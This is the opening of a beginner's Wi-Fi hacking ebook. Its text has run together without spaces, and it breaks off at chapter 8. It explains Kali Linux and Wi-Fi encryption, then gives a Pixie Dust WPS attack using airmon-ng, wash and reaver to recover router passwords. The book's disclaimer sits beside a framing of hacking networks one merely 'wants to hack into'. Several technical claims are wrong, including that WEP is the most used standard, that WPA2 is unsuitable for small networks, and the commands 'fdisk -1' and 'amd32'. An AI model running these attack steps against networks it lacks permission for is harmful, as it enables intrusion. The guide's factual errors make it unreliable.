WIRELESSHACKING

HOWTOHACKWIRELESSNETWORKS,ASTEP-BY-STEPGUIDE

FORBEGINNERS

JAMESSQUIRES

CONTENTS

Copyright

Intro

1.

Hacking:HowtoHackWirelessWEP/WPA/WPA2Networksin2Hours:AStep-by-StepGuidefor

Beginners

2.

WhatIsKaliLinux?

3.

WhatIsaWEP,aWPA,andaWPA2?

4.

DownloadingKaliLinux

5.

HowtoSetupandInstallKaliLinuxonaUSBKey

6.

VirtualizationandUsingVirtualBox

7.

UsingPixieWPSwithKaliLinux

8.

Step-by-StepGuidetoRunningandUsingKaliLinux

9.

HackingWAPandWAP2

10.

AdditionalResources

11.

Feedback

Allrightsreserved.

©Copyright2016-Allrightsreserved.

Innowayisitlegaltoreproduce,duplicate,ortransmitanypartofthisdocumentineitherelectronicmeansorinprinted
format.Recordingofthispublicationisstrictlyprohibitedandanystorageofthisdocumentisnotallowedunlesswith
writtenpermissionfromthepublisher.Allrightsreserved.

Theinformationprovidedhereinisstatedtobetruthfulandconsistent,inthatanyliability,intermsofinattentionor
otherwise,byanyusageorabuseofanypolicies,processes,ordirectionscontainedwithinisthesolitaryandutter
responsibilityoftherecipientreader.Undernocircumstanceswillanylegalresponsibilityorblamebeheldagainstthe
publisherforanyreparation,damages,ormonetarylossduetotheinformationherein,eitherdirectlyorindirectly.

Respectiveauthorsownallcopyrightsnotheldbythepublisher.

LegalNotice:

Thisbookiscopyrightprotected.Thisisonlyforpersonaluse.Youcannotamend,distribute,sell,use,quoteor
paraphraseanypartorthecontentwithinthisbookwithouttheconsentoftheauthororcopyrightowner.Legalaction
willbepursuedifthisisbreached.

DisclaimerNotice:

Pleasenotetheinformationcontainedwithinthisdocumentisforeducationalandentertainmentpurposesonly.Every
attempthasbeenmadetoprovideaccurate,uptodateandreliablecompleteinformation.Nowarrantiesofanykindare
expressedorimplied.Readersacknowledgethattheauthorisnotengagingintherenderingoflegal,financial,medical
orprofessionaladvice.

Byreadingthisdocument,thereaderagreesthatundernocircumstancesareweresponsibleforanylosses,director
indirect,whichareincurredasaresultoftheuseofinformationcontainedwithinthisdocument,including,butnot
limitedto,—errors,omissions,orinaccuracies.

INTRO

HowToHackAnyWirelessNetwork!AStepByStepGuideForBeginners

ByJamesSquires

T

1

HACKING:HOWTOHACKWIRELESSWEP/WPA/WPA2

NETWORKSIN2HOURS:ASTEP-BY-STEPGUIDEFOR

BEGINNERS

hementionoftheword“hacking”bringstomindallsortsofillegalactivity,solet’sget

adisclaimeroutofthewayfirstofall.Wearenotsupportinganyillegalactivity
whatsoever.Thehackingmethodspresentedinthisbookareintendedtobeusedby
informationsecurityprofessionalsandnetworksecuritypersonnel.Youshouldonlybe
usingthisinformationinawaythatislegalinyourlocation.

Networkhackingshouldonlybeperformedonnetworksthatyouhavepermissionto
performhackingon.Youwillwanttochecktomakesurethatitislegalforyoutodosoin
thecity,stateandcountrywhereyoulive.

Themethodspresentedinthisbookaremeanttobeusedtocheckforsecurityleaks,to
strengthensecuritynetworksandtohelpprivatenetworksoperatemoresmoothly.

Nowthatwe’vegottenthelegalessentialsoutoftheway,let’stalkabouthowyouwillgo
abouthackingyournetwork.Ifyouwantsomeguidancebeyondwhatiscoveredinthis
book,checkouttheadditionalresources.Thereyouwillfindinstructionsonhowto
receivefreevideosdeliveredstraighttoyourinbox.Justenteryouremailaddressonthe
site,andwewillsendyoufreestep-by-stepvideostohelpyououtwithallsortsof
commonoperatingsystemproblems.You’lllearnsomenewtricksandbeabletobetter
controltheoperatingsystemandkeepyoursecuritytight.

GettingtoKnowLinux

Inordertousethetoolswe’llbetalkingabout,youneedtohaveabasicunderstandingof
Linux.Linuxisanopensourceoperatingsystem,whichmeansthatanyonecanmodifyit
ordistributeit.It’sfreetouseanddownload,butspecialtyLinuxprograms,developedby
variouscorporationstobeusedformorespecificpurposes,cancostyou.Thedevelopers
willsellthosemodifiedLinuxsystemstowhoeverisinterestedinthem.SowhileLinuxis
free,ifyouwantsomethingdifferentthanthevanillaLinuxsystem,youmayhavetopay
forit.

LinuxisalotlikeWindows,inthatitisanoperatingsystem.Itbasicallyallowsallthe
programsonyourcomputertoworktogetherunderaunifiedsystem.Withoutanoperating
system,youcan’tusetheprogramsonyourcomputer.ButLinuxcanworkpractically
anywhere-onyourphone,tabletorevenyourwristwatch.Itisconstantlychangingtoo,
beingupdatedandmodifiedbydevelopersandcompaniesallovertheworld.New

versionsofLinuxcomeoutmoreoftenthananyotheroperatingsystem,soit’sagoodidea
tofamiliarizeyourselfwiththelatestversionbeforeyougettoofarintosomeofthetools
wewillbeusing.

OurApproachtoHackingaNetwork

Usingthestep-by-stepguideswehavelaidoutforyouinthisbook,youcanlearnhowto
hackintoawirelessnetwork,andyou’llbeabletodoitinaslittleastwohours.Itmaynot
beaverysimpleprocess,butwewillsimplifyitforyouasmuchaspossible.We’regoing
toassumeyouarenewtoallofthisandthatyoudon’tknowalltheterminologyand
processes.Thatway,thisbookcanbeusedbypracticallyanybody.Ifyoualready
understandsomeofthesteps,thenyoumaywanttoskipaheadtothepartoftheprocess
thatisgivingyoutrouble.We’regoingtogoslowlythroughallthistomakesureyoufully
understanditandthatyouhavenoproblemsgettingintoyournetwork.

LiveOperatingSystems

Aliveoperatingsystemisonethatisportable.ItcanbedownloadedintoaUSBdriveora
DVD.Youmighthearitcalleda“OS(operatingsystem)onastick”orevena“computer
onastick”.ThisbasicallymeansthatitcanbetakenanywhereonaUSBstick.The
operatingsystemcanfunctionmuchlikeacomputersometimes,evenholdingfilesand
programs,soyoucanessentiallytakeyourcomputerwithyou.

IfyouplugthatliveoperatingsystemintotheUSBportonacomputerthatisalready
runningWindowsorMacOSorUNIX,thenitwillstillbeabletousetheoperating
systemyouhaveonthestick.Inthiscase,wearetalkingaboutLinuxoraversionof
Linux.OnceyouplugyourUSBstickinorinsertyourDVD,theoperatingsystem
containedonthatportablemediawilltemporarilyoverridewhateveroperatingsystemis
currentlyinuseonthecomputer.Itwon’tmakeanypermanentchangestothatoperating
system.Itjusttakesoverforawhile.Onceyouremoveyourmedia,thenyouroperating
systemgoeswithitandthecomputer,phone,tablet,etc.canjustgobacktonormal.

Now,thisisreallyusefulwhenyouaretryingtoperformsecuritychecksoncomputers
thatrunonyourcompany’snetwork.Ifyouareinchargeofnetworksecurity,youmay
needtocheckindividualcomputers,butyouwantyourprogramsandfilestobeaccessible
throughthatcomputersoyoucanperformdiagnostics.Theliveoperatingsystemisthe
perfectsolutionforthat,anditallowsyoutotakewhatyouknowandwhatyouare
familiarwithanduseitanywhere.

We’regoingtoshowyouhowtodothat.

N

2

WHATISKALILINUX?

owwetalkedaboutversionsofLinuxthataremodifiedbycompaniesorvarious

developersforspecifieduse.That’swhatKaliLinuxis,anditisspecializedtoprovide
networksecurity.Insomeways,itisverybasic.Itwon’tworkwithalotofprograms,
becauseitisn’tmeanttoprovidegeneraloperatingsystemservices.Itdoesn’tworkquite
likeWindowsoreventhebasicLinuxsystem.Instead,itislaserfocusedonnetwork
security.

WewillbeusingKaliLinuxinourhackingguides,sowe’regoingtocoverwhatit’sall
about.

HowtoGetKaliLinux

WhileKaliLinuxisusedbysecurityprofessionalsallovertheworldandisahighly
specializedversionofLinux,itwon’tcostyouanything.Thedevelopersvowthatitwill
alwaysbefree,evenastheycontinuetoprovidesupportandupdatesfortheirversionof
Linux.TheyalsomakesurethatmodificationsarenotbeingmadetotheOSbyjust
anyone.TheycallKaliLinuxanopensourceOS,butonethatisdevelopedbyasmall
groupofpeopleunderverytightsecurity.Theyvetallchangescarefullyandmakesure
thatabsolutesecurityismaintainedontheproduct.

YouonlywanttodownloadKaliLinuxfromaverifiedsource.Thefollowingpages

https://www.kali.org/downloads

and

https://www.offensive-security.com/kali-linux-

vmware-arm-image-download/

bothoffersecuredversionsofKaliforyoutodownload.

WhatKaliLinuxDoes

Thiskindofoperatingsystemisknownasadistributionanditisdesignedforpenetration
testingandsecurityauditing.Itismeantforasingleuseratatime.Thislimitsthe
potentialforsecuritybreaches.

Infact,thissystemisveryparticularaboutsecurity,sinceitisdesignedforpeoplewho
workininformationandnetworksecurity.Itcanbemodifiedtoallowformoreusersand
tobecomecompatiblewithmanyprograms,butthatisn’tadvisable.Thatcancompromise
thesecurityofthesystem,whichdefeatsitspurpose.

ItisrecommendedthatyouworkwithintheparametersoftheKaliLinuxsystemsoasnot

toallowinanypotentialsecuritybreaches.Becauseitissuchaclosedsystem,itwon’tbe
compatiblewithprogramsthatpermitalotofonlineinteractionsoropensourcing.So
Steamwon’tworkwithitatall,norwillLaunchpadandmanyothercommonlyused
programs.Ifyouwanttorunthoseprograms,thenyoushouldreallyuseadifferent
operatingsystemthatisn’tdesignedtobeasnarrowlyfocusedasthisoneis.

IfyoutrytoinstalladditionalprogramsonLinuxthatconnecttoanetwork,suchas
Bluetooth,thenyouwon’thavemuchluck.Thesekindsofservicesaredisabledunderthe
defaultsettingsusedbyKaliLinux.Thedistributionisintendedtoremainsecure,and
unlessyoutamperwiththesettingsitwillstaythatway,eventothedetrimentofthe
programsyouwanttouseonit.

Youcantamperwiththeprogramasmuchasyoulike,openingitupforcompatibilitywith
justaboutanything,sinceitrunsoffofLinux.Butthat’snotagoodideaifyouwantto
maintainsecurity.Asyougetmoreusedtohowitworks,youcandomorewithitand
modifyitasyoulike,butwhenyoufirststartout,youprobablyshouldn’ttrytotamper
withit.Waituntilyouaremorefamiliarwithittostartdoinghigh-levelmodifications.

Y

3

WHATISAWEP,AWPA,ANDAWPA2?

ourWi-Finetworkiswhatconnectsallyourinternet-capabledevicestogetherinone

area.Inanofficebuilding,thatnetworkconnectsallthecomputers,scanners,tabletsand
otherdevices.Thiscangivethemameasureofsharedsecurity,asitmakesitdifficultfor
outsideforcestopenetrateandbecomepartofthenetwork.Itconservesresourcesand
helpsthecompanymaintaincontrolovertheircomputers’security.

Buthowsecureisyournetwork?Thatwillpartlydependonwhatkindofsecurity
classificationyourWi-Fihas.Wearegoingtolookatthreetypesofthese-WEPs,WPAs
andWPA2s.

Ifyouarereadingthischapter,thenyouprobablyneverpaidmuchattentiontothefew
lettersbesideyourWi-Finetwork’sname.Youmaynothavethoughttheymattered,but
somebodyhadtopickoneofthesechoiceswhentheyfirstsetupthewirelessnetworkyou
areusing.Oddsare,theydidn’tthinktoomuchabouttheirchoiceandjustwentwiththe
mostobviousone.

Butthatcanbeamistake.Theseencryptionstandardsdeterminehowsecureyournetwork
is.IfsomeoneisgettingintoyoursystemandusingyourWi-Fitodosomethingillegal,
thentheFBIaregoingtobehavingavisitwithyou.Theymaygettotheactualinfiltrator
eventually,buttheywillstartwiththeWi-Fisource.Knowinghowtokeepoutintrudersis
abigpartofrunningasecurenetwork.Beforeyoucandothat,youfirsthaveto
understandthesecurityclassificationsforWi-Finetworks.

WEP

WiredEquivalencyPrivacy,orWEP,istheWi-Fisecurityalgorithmthatisusedinmost
placesaroundtheworld.Partofthathastodowithhowlongithasbeenaround,anda
partofitisjustbecauseitisusuallythefirstchoiceinalistofsecurityalgorithms.People
whodon’tknowmuchaboutthesejustassumethatthefirstchoiceisthebest,whichis
whyitisconsideredthedefaultoption.Theydon’tunderstandwhatthedifferenceis
betweenthesechoices.

WEPbecamethestandardbackin1999,butitwasneververystrong.Astechnology
advanced,strongerversionsofWEPwereintroduced,butmostofthetime,themajorityof
peoplewerestillusingtherelativelyweakversions.

Thisstandardlostitsvalueovertimeasweaknesseswerediscovered.Whencomputing

powerincreasedtothepointwhereitbecauseasimplemattertobreaktheencryptionand
discovertheWi-Fipassword,WEPwasdroppedasthestandardbytheWi-FiAlliancein
2004.

WPA

Wi-FiProtectedAccess,orWPA,wasmeanttoreplaceWEPasitbegantoshowsignsof
weakness.TheWi-FiAllianceformallyadopteditin2003.AllWPAkeysthatareusedare
256-bit,whichmakesthemmuchstrongerthanthekeyscommonlyusedinWEPs(64and
128-bit).Thekeysrefertothelevelofencryptionthesystemhas,andWPA’swas
remarkablystrongerthanitscounterpart.

WPAshavemessageintegritycheckswhichlookforpacketsofdatathathavebeenaltered
orcapturedbyaninfiltratorasthesepacketspassbetweentheclientandtheaccesspoint.
Thekeysystemisevenalotmoreadvancedthanwhatwasbeingusedbefore.The
originalkeysystemthatcamewiththeWPAisoutdatednow,butatthetime,itwasahuge
leapforwardfornetworksecurity.

ButtheWPAhassomesecurityflaws.Itcamewithsomeofthesamecapabilitiesasits
predecessor,includingaTKIP(TemporaryKeyIntegrityProtocol),whichrequiredthat
thedeviceacceptfirmwareupdatesregularly.Thispresentedabackdoorforthesystem,
whichhackersweresoonabletoexploit.

TheWPAismoresecurethanitspredecessor,butitisalsostillvulnerabletoattack.This
hasbeenshowntimeandagaininpublicdemonstrations.Eventhoughitishardertobreak
into,andsupplementarysystemsusuallyserveastheaccesspointforintrudersratherthan
thealgorithmdirectly,thevulnerabilityisstillthere.

WPA2

Wi-FiProtectedAccess2,orWPA2,tookoverforthestandardWPAbackin2006.That’s
nottosaythattheolder,lesssecurealgorithmsaren’tstillavailable,becausetheyare.

TheWPA2stillusesTKIP,butitisconsideredafallbacksystemtobeusedonlyifthe
primarysystemfails.WhatreplacesTKIPistheCCMP,orCounterCipherModewith
BlockChainingMessageAuthenticationCodeProtocol.Thisnewprotocolisexcellentat
determiningifmessagesenteringthealgorithmareauthorized,makingitverydifficultto
infiltratethesystem.

Thissystemstillhasitsweaknesses,buttheyarefarfewerandmuchhardertoexploit.
Becausethiskindofalgorithmissoincrediblydifficulttopenetrate,theonlyentitieswho
useitthatwouldhavetoworryaboutinfiltrationarelargecompaniesthatdealwith
corporateespionage.Itsimplyisn’tworththeeffortitwouldtaketobreakintothissystem
fortheinformationcontainedontheaverageprivatenetwork.

AES

Wecan’ttalkaboutWEP,WPAandWPA2withoutmentioningAES.Itstandsfor
AdvancedEncryptionStandard,anditisaspecificationofasecurityalgorithm.Often,
AESisincludedinaWPA2algorithm,butitmaynotalwaysbebydefault.Forthevery
bestsecurity,youwanttopartneraWPA2securityalgorithmwithAES.Thatwillgive
youunprecedentedlevelsofsecurityandmakeyournetworkpracticallyimpenetrable.

WhichOneShouldYouUse?

Ifyouhavetheresourcesandtheprocessingpowertohandleit,youdefinitelywanttogo
withaWPA2securityalgorithm,preferablywithAESactivatedaswell.Butnoteveryone
willhavethatkindofprocessingpoweravailabletothem.

Ifyoudon’thavemuchprocessingpowerorresourcesatyourdisposal,thenusinga
WPA2securityalgorithmonsomethinglikeasmall,personalnetworkwouldnotbe
advisable.Itcanloweryourconnectionspeeds,createperformanceproblemsand
unnecessarilybogdownyoursystem.

Foranyenterprise-levelnetworks,however,WPA2withAESisrecommended.Itprovides
themostsecurity,andmostmediumtolargebusinesseshavethenecessaryresourcesto
runitsmoothlywithoutanyhiccupsintheirinternetspeed.

Y

4

DOWNLOADINGKALILINUX

ouhavetobeverycarefulaboutwhereyoudownloadKaliLinuxfrom.Thereare

plentyoffacsimileversionsouttherethatarenotmadebytheoriginaldevelopers.It
wouldbeveryeasyforanunscrupulousindividualtoslipinavirusorsomeother
malwarethatcouldcompromiseyournetwork.That’swhyyouhavetomakesureyouare
gettingnotonlya“pure”copyoftheoperatingsystembutalsothatyouaredownloading
itfromatrustworthysource.

ThebestwaytocertifythatwhatyouaregettingistherealdealistoverifytheSHA1
checksumsagainstastandardvalue.

IfyouwanttoruntheKaliLinuxOSfromaUSB(whichisnecessarytohackanetwork)
thenyouwillneedtoobtainabootableISOimage.A32-bitora64-bitimagewillwork
fine.

Youmaynotbequitesurewhatarchitectureyoursystemhasthatyouwanttorunthe
systemon.Ifthat’sthecase,thenyoucanrunthecommand“uname-m”.Justinputthis
onthecommandlineonyourIntel-basedPC.Aresponsewillcomeback.Ifitsays
“x86_64”thenyoushouldbeusingthe64-bitimage.Thatonewillhave“amd64”inthe
nameofthefile.

Youmightgettheresponse“1386”.Ifthatisthecase,thenusea32-bitimage.Thiswill
have“i386”inthefilename.

IfyouhaveaWindowsOS,thentheprocedurewillbeabitdifferent.ForWindows7or
WindowsVistausers,youcanbeginbyopeningtheStartmenu.GotoComputer,then
clickonProperties.UndertheSystemheading,viewthetypeofsystemthatyouhave.

ForaWindowsXPOS,thestepsaresimilar.GotoStarttobegin.Thenright-clickonMy
ComputerandclickPropertiesfromthere.Ifyouseethewords“x64edition”there,then
youhavea64-bitsystem.Ifnothingiswrittenthere,thenit’sa32-bitsystem.

KalicanberunasaguestunderVMware.ItactuallyalreadyhasVMwareToolsinstalled
andcanbefoundasapre-builtVMwarevirtualmachine.IfyouwanttheVMwareimage,
youwillfindtherearethreevariations-64-bit,32-bitand32-bitPAE.

ARM-baseddevicescanhavevariedarchitectures.Thatmeansthatasingletypeofimage
won’tworkacrossalltheARMmachines.You’llhavetodownloadKaliLinuximages

T

thatarepre-builtforARMarchitecture.YoucangotoGitHubtofindscriptsthatwillhelp
youbuildARMimagesonyourown.

IfyourunintoanytroublesettingupanARMenvironmentthatwillworkforKaliLinux
oryouwanttoknowhowtobuildyourowncustomchroot(arootdirectorychange
operation),youcanusethesearticles

here

http://docs.kali.org/development/kali-linux-arm-chroot

heKaliLinuximagescanbefoundontheOffensiveSecuritywebsite:

OffensiveSecurity.com.

VerifytheImageYouUseforKaliLinux

YoudefinitelywanttomakesurethatyouhaveanactualKaliLinuxOSandnotsome
imposter.Thisprofessionalpenetrationtestingtoolismeanttomaintainnetworksecurity.
Youcanuseittoinvestigatecomputersandnetworks,andyouneedtobeabletotrust
whatittellsyou.IfthereisanyproblemwithitandyouhaveaversionofKaliLinuxthat
differsfromtherealdeal,thenyoucanbecompromisingyournetworkandyourpersonal
information.Don’ttakethatrisk.Makesureyouverifywhatyouaregettingbeforeyou
downloadit.

SinceKaliisapenetrationtestingdistribution,afakeversionofitcouldcrippleyour
system.Therearelotsofthesebogusversionsoutthereandthereisnoshortageofpeople
whowouldwanttoputinsomesketchyadditionstothisdistribution.

Thebestwaytoavoidthisproblemistomakesureyouaredownloadingonlyfromthe
officialKalidownloadpages.YouwillneedanSSLtobrowsethesepages.That’sa
standardencryptionthatprotectstheserveandtheclientfrominterference.Itbasically
keepsthebadguysout.Buteventhesesourceshavetheirweaknesses.

Afteryoudownloadthenecessaryimage,besuretoverifyitbeforeyourunit.Youwant
tovalidatethatitistherealdealandnotsomethingthatcouldcontainmalware.

ThesimplestwaytodothisistocalculatethehashoftheISO’sSHA1.Thenjustinspectit
andcompareitagainstthevalueyoufindontheKaliLinuxsite.

Onceyou’vedoneallthis,andyouaresureyouaregettinganactualKaliLinux
distribution,youcanthendownloadit.

K

5

HOWTOSETUPANDINSTALLKALILINUXONAUSBKEY

aliLinuxisthebesthackingtooloutthere.Itissupersecure,anditismadeby

seasonedprofessionalswhoknowwhattheyaredoing.What’ssogreataboutthissystem
isthatyoucanrunitfromaUSBkeyandnothavetoworryaboutcompromisingor
alteringyourcurrentoperatingsystem.WhenyoucarrythisOSonaUSBkey,itcanbe
takentoanycomputerorcompatibledeviceandmadetowork.Itonlytemporarily
overridesthecurrentoperatingsystemonthatdevice.

OnceyoutakeoutyourUSBkey,youremoveKaliLinuxfromthedevice.Itdoesn’tleave
behindanytrace,anditdoesn’tchangethesettingsoroperatingsystemofthedeviceyou
usediton.Itiscompatiblewithanyoperatingsystembecauseitworksaroundthem.

Thisisconsideredanon-destructivewaytouseKaliLinux.Itletseverythinggobackto
normalonwhateverdeviceyouuseiton,makingnochangestothehost’ssystem.It’salso
portable,soyoucantakeitfromoneworkstationtothenextandfromonedevicetothe
nextanddowhatyouneedtodo.Itstartsupveryfast,usuallyinjustafewminutes,on
whateversystemyouputitinto.

Youcanalsocustomizeyourbootabledrive,usingaKaliLinuxISOimagethatyourolled
yourself.Itisalsopotentiallypersistent.Thismeansthat,onceyouperformtheproper
configurations,yourKaliLinuxLivedrivewillkeepthedataithascollectednomatter
howmanytimesyourebootit.

InstallingontoYourBootableUSBKey

WewillstartwithabootableUSBdrivethatalreadyhasanISOimageofKaliLinux.Be
surethatISOimageisverified.Wetalkedaboutthisinthelastchapter.

ForWindowsusers,youwillhavetofirstdownloadtheWin32DiskImagerutility.You’ll
findthat

here

.

https://launchpad.net/win32-image-writer

IfyouareusingaLinuxoranOSX,justusetheddcommand.Thishasalreadybeen
installedonbothofthoseplatforms.

Werecommendusinga4GBUSBthumbdriveorlarger.IfyouwanttouseanSDcard,
thenthat’sfine,sincetheprocedureisthesameforboth.Justmakesurethedevicesyou
aregoingtobeusingitonarecompatiblewithyourstoragedevice.

ThemethodfordoingthiswilldifferdependingonwhatOSyouhave.We’llbreakit
downonbothofthemajoronesforyou.

ForWindows

StartbypluggingyourUSBdriveintoaUSBportonaPCoperatingWindows.Pay
attentiontothedrivedesignatorthatituseswhenitstartstomount.Thatdesignatorwill
looklike“F:\”.ThenlaunchtheWin32DiskImagersoftware.Onceyouopenthat
software,pickouttheKaliLinuxISOfileyoudownloaded.Thenclick“Write”tocopyit
ontotheUSBdrive,besureyoupicktherightdriveforthisoperation.

Whentheimagingprocessisfinished,youcantakeoutyourUSB.OnmostWindowsOS,
youwillneedtoclickonthesmallarrownearthebottomrightcornerofyourscreento
openatabthatshowsconnecteddevices.BesuretoclickonyourUSBdrivethereto
safelyejectitandensurethatnoinformationislostwhenyoudisconnectit.

Onceallthatisdone,youcanbootKaliLinuxfromyourUSBdevice.

ForLinux

DoingthesamethingonaLinuxisequallyeasy.StartwiththeverifiedISOimageand
copyitovertothedriveusingtheddcommand.Youhavetoberunningasarootforthis
towork.Alternatively,youcanexecutetheddcommandusingsudo.Theinstructions
we’regoingtogiveyouassumethatyouhaveaLinuxMint17.1desktop.Otherversions
aregoingtovaryslightly,butthebasicoperationsrequiredforthistaskshouldallbeabout
thesame.

Justawordofwarningbeforewegetintotheactualinstruction:ifyouaren’tsurewhat
youaredoingwithddcommandoryoujustaren’tcareful,youcanaccidentlyoverwrite
somethingyouaren’tmeaningto.Besuretodoublecheckeverythingyouaredoingso
youdon’tmakeanymistakes.

StartbyidentifyingthedevicepathyouaregoingtousetowritetheimageontotheUSB
drive.Beforethedriveisinserted,performthecommand“sudofdisk-1”

Youhavetobeusingelevatedprivilegeswithfdisk,otherwisetherewon’tbeanyoutput.
Entertheabovecommandinaterminalwindowatacommandprompt.Ifyoudidit
properly,youshouldseeasingledrive.Thatwillprobablylooklikethis“/dev/sda”.That
drivewillbeseparatedintothreepartitions.Theseare/dev/sda1,/dev/sda2,and/dev/sda5.

Fromthere,plugintheUSBdrive,thenruntheoriginalcommandagain.That’ssudofdisk
-1.Onceyoudothat,youwillseeanotherdevicethatwasn’tthereinitially.Itcouldlook
somethinglikethis:“/dev/sdb”.

ThentaketheISOfileandimageitontotheUSBdevice.Itmaytake10-15minutesto
imagetheUSBdevice,sobepatient.Inordertoperformthisprocess,youneedtoexecute
thecommandbelow:

ddif=kali-linux-1.0.9a-amd32.isoof=/dev/sdbbs=512k

Let’sdissectthiscommandforasecond.Intheexampleweareusinghere,theISOimage
thatyouwanttowriteontothedriveisnamed“kali-linux-1.0.9a-amd32.iso”.Yoursmay
lookslightlydifferent.Notethe“32”inthename.Thisreferstothesizeoftheimage.We

usetheblocksizevalue“bs=512k”becauseitissafeandreliable.Youcanmakeitbigger
ifyouwant,butthatcancausesomeproblems,soitisn’trecommended.

Oncethecommandiscompleted,thenitwillprovidefeedbackandnotbeforethen.Your
drivecouldhaveanaccessindicator.Ifitdoes,thenitwillblinkeverysooften.Howlong
thiswholeprocesstakeswilldependonafewfactors-howfastyoursystemis,whatkind
ofUSBdriveyouareusingandhowwellyourUSBportworks.Theoutput,oncethe
imagingiscomplete,willtellyouhowmanybytesarecopiedandgiveyounumbersfor
recordsinandout,whichshouldbethesamenumber.

NowyourUSBisreadytobootintoaKaliLiveenvironment.

K

6

VIRTUALIZATIONANDUSINGVIRTUALBOX

aliLinuxletsyouuseitsownoperatingsystemwithoutinterferingwiththeoriginal

operatingsystemonwhatevercomputertootherdeviceyouaretryingtohackinto.We’ve
coveredthisalready,butwhataboutthoseinstanceswhereyouwanttotestprogramsthat
arenotcompatiblewithoneOSoranother?

That’swherevirtualizationcomesinhandy.Itallowsyoutosetupanoutsidesystemthat
workswiththeexistingoperatingsystem.Thenyoucanjustpickandchoosewhich
programyouwanttotest.YoucantakeaprogramthatworksonlyonWindows,for
example,andrunitthroughyourKaliLinuxdistributionwhileyouhaveyourUSBwith
KaliLinuxpluggedintothehostdevice.Butyouwillneedavirtualizationprogram.

That’swhatVirtualBoxis,anditdoesalotmorethanjustletyoutestspecificprograms
thatwouldn’tnormallybecompatiblewiththeOSyouareusing.Italsoallowsyoutorun
operatingsystemsthatnolongerworkonyourcurrenthardware.Yourcomputermaynot
beabletorunanoldDOSoperatingsystem,butwhenyouuseavisualizationtoollike
VirtualBox,youcanrunthatoperatingsystemagain.

Youcanalsorunmultipleoperatingsystemsatonce.WetalkedabouthowKaliLinux
temporarilyoverridestheoperatingsystemofwhateverdeviceyouhaveitpluggedinto.
ButonceyouhaveVirtualBoxrunning,youcanessentiallyhavebothKaliLinuxandthat
hostoperatingsystemgoingatthesametime.Itgivesyoulotsmoreoptions,allowingyou
todofarmorethanyoucouldotherwise.

Youcanalsosavethestateofasystemandmakethatsystemreverttoitsoldstate
wheneveryouwant.Thatgivesyoutonsofroomtoplayaroundwith.Youcanexperiment
andtrydifferentthings,thenwhenyoumakeafatalerror,youcanjustrevertthesystem.

VirtualBoxcanbefoundonVirtualBox.org.Itisanopensourcetool,soitisconstantly
beingupdatedandit’sfree.Likewithalltheothertoolswecoverinthisbook,youonly
wanttodownloadiffromtheoriginalsource.Ifyougetitanywhereelse,itcouldbea
bogusversionthatiscorruptedwithmalware.

VirtualBoxiscompatiblewithjustaboutanyoperatingsystem,soyoushouldn’thaveany
troublegettingittoworkwithwhateveryouhave.ThelimitsofVirtualBoxcomedownto
yourprocessingpowerandmemory.Youcanrunasmanyvirtualmachinesinsideyour
deviceasyouhavememoryfor.Youcanalsohaveasmantyprogramsrunning

concurrentlyfromasmanyoperatingsystemsasyourdevicecanhandle.

Ifyouhavenotdonemuchhackingbefore,thenVirtualBoxisanindispensabletool.You
cansaveyourcomputer’scurrentstatetorestoreitlaterincasesomethinghappens.
Individualswhotryhackingforthefirsttimeontheircomputeroftenmakemistakesthey
wishtheycouldtakeback.UsingaVirtualBox,theyactuallycan.

ThistoolcanbeaddedtoyourUSBdriveandworkinconjunctionwithKaliLinux,soit’s
noproblemtotakeitwithyouwhereyouneedtogo.

T

7

USINGPIXIEWPSWITHKALILINUX

helatestversionsofKaliLinuxalreadycomeprepackagedwithaprogramcalled

PixieWPS.ItworksreallywellwithKaliLinuxandisanobviouspartnerforit.

WhatPixieWPSdoesisperformanattackonanetwork.Itguessesthepinnumberor
passwordforthenetwork.Thisissomethingthathadtobedonemanuallyinthepast,but
thankstoPixieWPSitisnowautomated.Thisattack,calledapixiedustattack,canguess
mostnetworkpasswordsinaslittleas1secondandasmuchas30seconds.Howlongthe
processtakeswilldependonthenetwork’ssecurity.

ThePixieWPStoolactuallycameintoexistenceoutoftheKaliLinuxforums,soit’s
entirehistoryhasbeenlinkedtothisdistribution.

Ifyoudon’thavePixieWPSonyourKaliLinuxdistribution,thenyouareprobably
runninganolderversion.Youcansimplyusethefollowingcommandtogetanupdatefor
thatprogramandstartrunningthecurrentonewithPixieWPSincluded:“apt-getupdate”.

RunningPixieWPS

Generally,PixieWPSworksbestwithReaver,whichisacomplementaryprogramthat
aidsintheofflinenetworkattack.We’regoingtoassumeyouhaveReaverinstalledwith
yourKaliLinuxforthisguide.

InordertoobtainReaver,youcangotoGitHubanddownloadit-thatis,ifyoudon’t
alreadyhaveit.LikePixieWPS,Reavershouldalreadybeinstalledonthelatestversionof
KaliLinux.ThisopensourcetoolusesabruteforceapproachtohackingintoaWi-Fi
network.PixieWPShelpsrefineitsapproachandensurethatitdoesn’ttakeverylongto
getthedesiredresults-namely,accesstothenetwork.

Now,Reaverwillsometimestimeoutorgetstuckinaloop.Itwilljustdothesamething
overandoveragain.Whenthishappens,youshouldjustletitrun.Itwilleventuallywork
itselfout.makesureyoukeepitclosetotheroutersoitdoesn’thaveanytroubleaccessing
thenetwork.

Ifyoufeellikethepixiedustattackistakinglongerthanyouwouldlike,youcanalways
comebacklater.JustpausetheprogramwithCtrl+C.Thiswillsaveyourprogress,and
youcancomebacklaterandstartbackrightwhereyouleftoff.Sometimes,thereare
factorsthatpreventtheattackfrombeingcompletedintheusual30-secondtimeframe.

Theremaybenetworkproblems,compatibilityissuesorotherproblemsthatarehindering
yourprogress.Justknowthatyoudon’thavetoperformtheentireattackinonego.

OnceyouhavealltherequisiteprogramsonKaliLinux,youcanlaunchapixiedustattack
prettyeasily.Justputyourinterfaceintomonitormode.Youdothatwiththecommand
“airmon-ngstart”.Thenyoucanstartlookingforatarget.Usethecommand“wash-i”on
themonitorinterface.

YouwillneedtheBSSID(individualizedrouternumber)andchannelnumberoftherouter
beforeyoubegintheattack.Youalsowanttomakesureyoursignalisstrong.

Youcanlaunchyourattackbyenteringthecommand“reaver-i(monitorinterface)-b
(BSSIDoftherouter)-c(therouter’schannelnumber)-vvv-K1-f”.

Thatshouldgiveyouthepasswordshortly.Thisisn’tsomethingthatwillworkonevery
router,butmostofthemshouldbesusceptibletoit.UsingPixieWPSisalmostalways
moreeffectivethansomesortofbruteforcetactic,anditworkslotsfaster.

O

8

STEP-BY-STEPGUIDETORUNNINGANDUSINGKALILINUX

nceyouhaveKaliLinuxdownloadedandyouarenearanetworkyouwanttohack

into,youcanstartthehackingprocess.Belowareafewstep-by-stepguidesonhowtodo
it.

BasicHackforOlderWindowsSystems

We’regoingtostartwithaverybasichackthatworksonmanyolderoperatingsystems.It
